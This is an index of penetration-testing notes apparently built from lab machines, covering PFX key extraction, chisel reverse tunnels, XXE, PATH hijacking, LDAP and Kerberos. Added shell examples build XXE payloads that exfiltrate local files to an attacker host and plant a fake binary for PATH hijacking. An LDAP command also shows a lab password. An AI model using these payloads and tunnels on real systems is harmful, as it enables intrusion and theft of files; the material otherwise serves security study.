Shuciran Pentesting Notes

Legacy PFX Certificate

Login via PFX File: First we need to extract the key and the certificate from the .pfx file:
# Extracting the public certificate:
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out public...
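As an added example (not from the notes above), the following script builds a throwaway PFX with openssl and then splits it the way the note does: `-clcerts -nokeys` for the certificate, `-nocerts -nodes` for the unencrypted private key, followed by a check that the key really belongs to the certificate before you try to log in with it. All file names and the password "demo" are assumptions; the real bundle on the page is `legacyy_dev_auth.pfx`.

```shell
#!/bin/sh
# Added example: split a PFX into certificate + key and verify they pair up.
# File names and the password are assumptions for this demo.
set -eu

# Constructed test material: self-signed cert + key, bundled into demo.pfx
# protected with the password "demo".
make_demo_pfx() {
  dir=$1
  openssl req -x509 -newkey rsa:2048 -nodes -days 1 -subj "/CN=demo" \
    -keyout "$dir/demo.key" -out "$dir/demo.crt" >/dev/null 2>&1
  openssl pkcs12 -export -in "$dir/demo.crt" -inkey "$dir/demo.key" \
    -out "$dir/demo.pfx" -passout pass:demo
}

# extract_pfx <file.pfx> <password> <outdir>
# Writes public.crt (certificate only) and private.key (unencrypted key),
# then prints the certificate subject. Returns 1 if key and cert do not match.
extract_pfx() {
  pfx=$1; pass=$2; out=$3
  # Certificate only (no key material).
  openssl pkcs12 -in "$pfx" -clcerts -nokeys -out "$out/public.crt" -passin "pass:$pass"
  # Private key only, written without a passphrase (-nodes) for tool use.
  openssl pkcs12 -in "$pfx" -nocerts -nodes -out "$out/private.key" -passin "pass:$pass"
  # Pairing check: the public key embedded in the cert must equal the one
  # derived from the private key; compare their PEM encodings by hash.
  certpub=$(openssl x509 -in "$out/public.crt" -pubkey -noout | openssl sha256)
  keypub=$(openssl pkey -in "$out/private.key" -pubout | openssl sha256)
  [ "$certpub" = "$keypub" ] || return 1
  openssl x509 -in "$out/public.crt" -noout -subject
}
```

If the PFX was exported with a password you do not know, `openssl pkcs12` fails at the MAC check; the bundle itself can be fed to `pfx2john` / hashcat in that case rather than guessing interactively.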

Chisel

Download Chisel
Remote (reverse) port forwarding, chisel as client. The server side runs on the attacker host and must be started with the --reverse flag, otherwise R: forwards are refused:
# Single Port
.\chisel.exe client 10.10.16.4:1337 R:1433:localhost:1433
# All the ports
./chisel client 10.10.14.3:1234 R:127.0.0.1:socks ...

XXE Blind Out of Band

Detection
You can often detect blind XXE using the same technique as for XXE SSRF attacks but triggering the out-of-band network interaction to a system that you control. For example, you would def...

XXE Basic

Headers: For the payload to reach the XML parser the request body must be sent as XML, normally Content-Type: text/xml (application/xml is also widely accepted):
POST /action HTTP/1.0
Content-Type: text/xml
File Reading: While exploring an XXE it is important to use the tags provided by the appl...
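Added example covering both the blind out-of-band detection note and the basic file-read note above (this is not code from the notes): shell functions that emit the three pieces you actually need, the reflected file-read payload, the blind payload that pulls a parameter-entity DTD from your host, and the DTD itself that exfiltrates the file in a second request. The attacker address, the `/xxe.dtd` path and the `<data>`/`<name>` tag names are assumptions; substitute the tags the target application really parses.

```shell
#!/bin/sh
# Added example, not from the page. ATTACKER host, /xxe.dtd and the
# <data>/<name> tags are assumptions.
set -eu

# File-read payload: the entity is referenced inside a tag whose value the
# application reflects, so the file content comes back in the response.
xxe_file_read_payload() {
  tag=$1; file=$2
  cat <<EOF
<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file://$file">
]>
<data><$tag>&xxe;</$tag></data>
EOF
}

# Blind / out-of-band payload: nothing is reflected, so a parameter entity
# fetches a DTD from a host we control; the hit in our HTTP log is the detection.
xxe_oob_payload() {
  attacker=$1
  cat <<EOF
<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY % remote SYSTEM "http://$attacker/xxe.dtd">
  %remote;
]>
<data><name>probe</name></data>
EOF
}

# The DTD served at http://$attacker/xxe.dtd: reads the file into a parameter
# entity and exfiltrates it in the query string of a second request.
# &#x25; is a percent sign, needed because % is not allowed literally inside
# an entity value in the internal subset.
xxe_oob_dtd() {
  attacker=$1; file=$2
  cat <<EOF
<!ENTITY % file SYSTEM "file://$file">
<!ENTITY % wrap "<!ENTITY &#x25; exfil SYSTEM 'http://$attacker/?d=%file;'>">
%wrap;
%exfil;
EOF
}

# Delivery: prints the curl command line. The Content-Type is what makes the
# server hand the body to its XML parser in the first place.
xxe_curl_cmd() {
  url=$1; payload_file=$2
  printf 'curl -s -X POST -H "Content-Type: text/xml" --data-binary @%s %s\n' \
    "$payload_file" "$url"
}
```

The exfiltration form only works cleanly for single-line files, since a newline breaks the URL; for multi-line targets on PHP hosts wrap the file in `php://filter/convert.base64-encode/resource=`, or use an FTP listener instead of HTTP.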

Powershell Modules

Nishang
If we want to load a .ps1 file such as one of the Nishang scripts on a Windows machine, we can modify the last line of the file so that the script is loaded and the function is then executed:
Write-Warning "S...

NTP (UDP 123)

Basic Enumeration
ntpq -c readlist <IP_ADDRESS>
ntpq -c readvar <IP_ADDRESS>
ntpq -c peers <IP_ADDRESS>
ntpq -c associations <IP_ADDRESS>
ntpdc -c monlist <IP_ADDRESS> (monlist is disabled in ntpd 4.2.7p26 and later, so a timeout here usually means a patched server, not a filtered port)...

LDAP (tcp-389, tcp-636, tcp-3268)

LDAPDOMAINDUMP
Dumping useful information from the domain controller via LDAP:
ldapdomaindump -u 'htb.local\amanda' -p 'Ashare1972' 10.10.10.103
[*] Connecting to host...
[*] Binding to host
[+] Bi...

KERBEROS (tcp-88)

Explanation
The Kerberos authentication protocol used by Microsoft is adopted from the Kerberos version 5 authentication protocol created by MIT and has been used as Microsoft's primary authenticat...

Linux PATH Hijacking

In order to exploit a PATH Hijacking we need to identify two things:
1) A script or binary that runs in another user's context (SUID/SGID, sudo rule, cron job).
2) A command invoked by bare name rather than by absolute path, so that it is resolved through the caller's PATH, or a libra...
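An added example (not from the notes) that shows both conditions end to end: a stand-in "privileged" script that calls `ls` by bare name, the fake `ls` an attacker drops into a directory they control, and the hardened version of the script that resets PATH and uses the absolute path. The script and file names are assumptions; in a real engagement the privileged script is whatever sudo/cron/SUID target you found.

```shell
#!/bin/sh
# Added example, not from the page: minimal PATH hijack and its fix.
# Script names and the attacker directory are assumptions.
set -eu

# Constructed stand-in for the privileged script: "ls" goes through PATH.
write_vulnerable() {
  cat > "$1/backup.sh" <<'EOF'
#!/bin/sh
ls /tmp > /dev/null
echo "backup done"
EOF
  chmod +x "$1/backup.sh"
}

# Hardened stand-in: fixed PATH plus absolute command path, so a writable
# directory earlier in the caller's PATH no longer matters.
write_hardened() {
  cat > "$1/backup_safe.sh" <<'EOF'
#!/bin/sh
PATH=/usr/bin:/bin
export PATH
/bin/ls /tmp > /dev/null
echo "backup done"
EOF
  chmod +x "$1/backup_safe.sh"
}

# Attacker side: a fake "ls" that records who ran it, then hands over to the
# real binary so the victim script sees nothing unusual.
plant_fake_ls() {
  cat > "$1/ls" <<'EOF'
#!/bin/sh
echo "HIJACKED: running as $(id -un)" >> "$(dirname "$0")/proof.txt"
exec /bin/ls "$@"
EOF
  chmod +x "$1/ls"
}

# run_with_hijack <script> <attacker_dir>
# Runs the script with the attacker directory first in PATH and prints
# "hijacked" if the fake ls executed, "safe" otherwise.
run_with_hijack() {
  script=$1; attacker_dir=$2
  rm -f "$attacker_dir/proof.txt"
  PATH="$attacker_dir:$PATH" "$script" > /dev/null
  if [ -f "$attacker_dir/proof.txt" ]; then echo hijacked; else echo safe; fi
}
```

With sudo the relevant question is whether `env_reset` / `secure_path` are in effect, since they strip the attacker's PATH before the target runs; cron jobs and SUID binaries that spawn a shell are the cases where a bare command name is reliably exploitable.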

Responder

LLMNR (Link-Local Multicast Name Resolution)
What is LLMNR? Link-Local Multicast Name Resolution. Used to identify hosts when DNS fails to do so. It is the successor of NBT-NS (NetBIOS Name Service), which Windows still keeps enabled alongside it as a further fallback. The main drawb...